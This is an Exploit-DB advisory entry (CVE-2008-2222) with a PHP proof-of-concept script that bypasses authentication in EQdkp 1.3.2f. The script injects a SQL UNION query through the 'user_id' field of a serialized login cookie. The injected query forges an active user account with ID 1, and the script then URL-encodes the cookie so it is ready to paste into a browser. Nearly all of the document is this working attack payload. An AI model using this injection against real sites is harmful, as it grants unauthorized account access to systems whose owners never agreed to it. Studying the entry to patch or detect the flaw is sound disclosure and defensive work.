[] NeoSense

EQdkp 1.3.2f - 'user_id' Authentication Bypass

Author: vortfu
type: webapps
platform: php
port: 
date_added: 2008-05-12 
date_updated: 2016-12-02 
verified: 1 
codes: OSVDB-45149;CVE-2008-2222 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comeqdkp-1.3.2f.zip

<?php
   // EQDKP 1.3.2f Authentication Bypass (PoC)
   // vort.fu@gmail.com

   $data['auto_login_id'] = 'x';
   $data['user_id']       = "1' " .
                            "UNION SELECT " .
                               "1, " .         // * user_id
                               "'a', " .       // username
                               "'x', " .       // * user_password
                               "'', " .        // user_email
                               "1, " .         // user_alimit
                               "1, " .         // user_elimit
                               "1, " .         // user_ilimit
                               "1, " .         // user_nlimit
                               "1, " .         // user_rlimit
                               "1, " .         // user_style
                               "'english', " . // user_lang
                               "NULL, " .      // user_key
                               "1, " .         // user_lastvisit
                               "NULL, " .      // user_lastpage
                               "1, " .         // * user_active
                               "NULL, " .      // user_newpassword
                               "NULL " .       // session_current
                            "ORDER BY " .
                               "username ASC" .
                            "/*";

   $cookie = serialize($data);
   echo "eqdkp_data\n\n";

   for($i = 0; $i < strlen($cookie); $i++)
      echo '%' . bin2hex($cookie[$i]);

   echo "\n\n";
?>

# milw0rm.com [2008-05-13]